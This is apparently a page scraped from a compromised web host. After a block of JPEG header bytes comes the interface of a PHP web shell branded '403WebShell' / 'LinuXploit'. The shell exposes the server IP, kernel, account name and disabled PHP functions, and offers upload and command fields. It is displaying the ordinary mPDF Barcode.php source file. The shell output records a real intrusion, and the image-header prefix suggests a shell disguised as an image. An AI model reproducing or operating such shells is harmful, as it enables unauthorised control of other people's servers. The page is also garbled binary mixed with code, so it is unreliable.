JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 91.108.119.32  /  Your IP : 216.73.217.106
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/./root/proc/self/root/home/u686484674/vendor/mpdf/mpdf/src/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/./root/proc/self/root/home/u686484674/vendor/mpdf/mpdf/src/Barcode.php
<?php

namespace Mpdf;

class Barcode
{

	public function getBarcodeArray($code, $type, $pr = '', $quiet_zone_left = null, $quiet_zone_right = null)
	{
		$barcode = $this->getBarcode($code, $type, $pr, $quiet_zone_left, $quiet_zone_right);
		return $barcode ? $barcode->getData() : false;
	}

	public function getChecksum($code, $type)
	{
		$barcode = $this->getBarcode($code, $type);
		return $barcode ? $barcode->getChecksum() : false;
	}

	/**
	 * @param string $code
	 * @param string $type
	 * @param float $pr
	 *
	 * @return \Mpdf\Barcode\BarcodeInterface
	 */
	public function getBarcode($code, $type, $pr = 0.0, $quiet_zone_left = null, $quiet_zone_right = null)
	{
		switch (strtoupper($type)) {
			case 'ISBN':
			case 'ISSN':
			case 'EAN13': // EAN 13
				return new Barcode\EanUpc($code, 13, 11, 7, 0.33, 25.93);

			case 'UPCA': // UPC-A
				return new Barcode\EanUpc($code, 12, 9, 9, 0.33, 25.91);

			case 'UPCE': // UPC-E
				return new Barcode\EanUpc($code, 6, 9, 7, 0.33, 25.93);

			case 'EAN8': // EAN 8
				return new Barcode\EanUpc($code, 8, 7, 7, 0.33, 21.64);

			case 'EAN2': // 2-Digits UPC-Based Extention
				return new Barcode\EanExt($code, 2, 7, 7, 0.33, 20, 9);

			case 'EAN5': // 5-Digits UPC-Based Extention
				return new Barcode\EanExt($code, 5, 7, 7, 0.33, 20, 9);

			case 'IMB': // IMB - Intelligent Mail Barcode - Onecode - USPS-B-3200
				$xdim = 0.508; // Nominal value for X-dim (bar width) in mm (spec.)
				$bpi = 22; // Bars per inch
				return new Barcode\Imb($code, $xdim, ((25.4 / $bpi) - $xdim) / $xdim, ['D' => 2, 'A' => 2, 'F' => 3, 'T' => 1]);

			case 'RM4SCC': // RM4SCC (Royal Mail 4-state Customer Code) - CBC (Customer Bar Code)
				$xdim = 0.508; // Nominal value for X-dim (bar width) in mm (spec.)
				$bpi = 22; // Bars per inch
				return new Barcode\Rm4Scc($code, $xdim, ((25.4 / $bpi) - $xdim) / $xdim, ['D' => 5, 'A' => 5, 'F' => 8, 'T' => 2]);

			case 'KIX': // KIX (Klant index - Customer index)
				$xdim = 0.508; // Nominal value for X-dim (bar width) in mm (spec.)
				$bpi = 22; // Bars per inch
				return new Barcode\Rm4Scc($code, $xdim, ((25.4 / $bpi) - $xdim) / $xdim, ['D' => 5, 'A' => 5, 'F' => 8, 'T' => 2], true);

			case 'POSTNET': // POSTNET
				$xdim = 0.508; // Nominal value for X-dim (bar width) in mm (spec.)
				$bpi = 22; // Bars per inch
				return new Barcode\Postnet($code, $xdim, ((25.4 / $bpi) - $xdim) / $xdim, false);

			case 'PLANET': // PLANET
				$xdim = 0.508; // Nominal value for X-dim (bar width) in mm (spec.)
				$bpi = 22; // Bars per inch
				return new Barcode\Postnet($code, $xdim, ((25.4 / $bpi) - $xdim) / $xdim, true);

			case 'C93': // CODE 93 - USS-93
				return new Barcode\Code93($code, $quiet_zone_left, $quiet_zone_right);

			case 'CODE11': // CODE 11
				return new Barcode\Code11($code, ($pr > 0) ? $pr : 3, $quiet_zone_left, $quiet_zone_right);

			case 'MSI':  // MSI (Variation of Plessey code)
				return new Barcode\Msi($code, false, $quiet_zone_left, $quiet_zone_right);

			case 'MSI+': // MSI + CHECKSUM (modulo 11)
				return new Barcode\Msi($code, true, $quiet_zone_left, $quiet_zone_right);

			case 'CODABAR': // CODABAR
				return new Barcode\Codabar($code, ($pr > 0) ? $pr : 2.5, $quiet_zone_left, $quiet_zone_right);

			case 'C128A': // CODE 128 A
				return new Barcode\Code128($code, 'A', false, $quiet_zone_left, $quiet_zone_right);

			case 'C128B': // CODE 128 B
				return new Barcode\Code128($code, 'B', false, $quiet_zone_left, $quiet_zone_right);

			case 'C128C':  // CODE 128 C
				return new Barcode\Code128($code, 'C', false, $quiet_zone_left, $quiet_zone_right);

			case 'C128RAW':  // CODE 128 RAW -- code is a space separated list of codes with startcode but without checkdigit,stop,end ex: "105 12 34"
				return new Barcode\Code128($code, 'RAW', false, $quiet_zone_left, $quiet_zone_right);

			case 'EAN128A':  // EAN 128 A
				return new Barcode\Code128($code, 'A', true, $quiet_zone_left, $quiet_zone_right);

			case 'EAN128B':  // EAN 128 B
				return new Barcode\Code128($code, 'B', true, $quiet_zone_left, $quiet_zone_right);

			case 'EAN128C': // EAN 128 C
				return new Barcode\Code128($code, 'C', true, $quiet_zone_left, $quiet_zone_right);

			case 'C39':  // CODE 39 - ANSI MH10.8M-1983 - USD-3 - 3 of 9.
				return new Barcode\Code39($this->sanitizeCode($code), ($pr > 0) ? $pr : 2.5, false, false, $quiet_zone_left, $quiet_zone_right);

			case 'C39+': // CODE 39 with checksum
				return new Barcode\Code39($this->sanitizeCode($code), ($pr > 0) ? $pr : 2.5, false, true, $quiet_zone_left, $quiet_zone_right);

			case 'C39E': // CODE 39 EXTENDED
				return new Barcode\Code39($this->sanitizeCode($code), ($pr > 0) ? $pr : 2.5, true, false, $quiet_zone_left, $quiet_zone_right);

			case 'C39E+': // CODE 39 EXTENDED + CHECKSUM
				return new Barcode\Code39($this->sanitizeCode($code), ($pr > 0) ? $pr : 2.5, true, true, $quiet_zone_left, $quiet_zone_right);

			case 'S25':  // Standard 2 of 5
				return new Barcode\S25($code, false, $quiet_zone_left, $quiet_zone_right);

			case 'S25+': // Standard 2 of 5 + CHECKSUM
				return new Barcode\S25($code, true, $quiet_zone_left, $quiet_zone_right);

			case 'I25':  // Interleaved 2 of 5
				return new Barcode\I25($code, 0, ($pr > 0) ? $pr : 2.5, false, $quiet_zone_left, $quiet_zone_right);

			case 'I25+': // Interleaved 2 of 5 + CHECKSUM
				return new Barcode\I25($code, 0, ($pr > 0) ? $pr : 2.5, true, $quiet_zone_left, $quiet_zone_right);

			case 'I25B':  // Interleaved 2 of 5 + Bearer bars
				return new Barcode\I25($code, 2, ($pr > 0) ? $pr : 2.5, false, $quiet_zone_left, $quiet_zone_right);

			case 'I25B+': // Interleaved 2 of 5 + CHECKSUM + Bearer bars
				return new Barcode\I25($code, 2, ($pr > 0) ? $pr : 2.5, true, $quiet_zone_left, $quiet_zone_right);
		}

		return false;
	}

	private function sanitizeCode($code)
	{
		$code = str_replace(chr(194) . chr(160), ' ', $code); // mPDF 5.3.95  (for utf-8 encoded)
		$code = str_replace(chr(160), ' ', $code); // mPDF 5.3.95	(for win-1252)

		return $code;
	}

}

Youez - 2016 - github.com/yon3zu
LinuXploit